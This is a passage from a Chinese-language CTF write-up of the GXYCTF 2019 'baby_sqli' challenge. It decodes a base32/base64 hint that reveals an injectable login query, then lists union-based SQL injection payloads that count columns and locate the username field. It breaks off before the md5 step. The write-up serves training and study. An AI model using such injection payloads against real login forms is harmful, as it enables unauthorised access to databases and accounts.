0x00:GXYCTF部分详细题解
2019GXYCTF结束,这里我写下较详细的部分题解,希望可以帮到大家!
0x01:baby_sqli进来后是一个 登录页面
首先 尝试下
admin
123
登录,然后查看 源代码,发现一串很可疑的字符串
尝试了下,发现是base32编码
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
对其进行解码得到:
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
然后base64 解码得到:
select * from user where username = '$name'
应该是 提示我们 要从 username 入手我们查看下 他有几个字段
admin' union select 1,2,3#
admin' union select 1,2,3,4#
可以得到 是3个字段我们猜测字段名是
ip username password
然后我们通过下面语句
admin' union select 1,'admin',3#
//即把admin 放到第二个位置 不报错得到第二个字段就是我们的username字段然后 题目提示了"md5",于是我们便可以去猜测 它的后端是怎么写的:
关注
打赏
立即登录/注册


微信扫码登录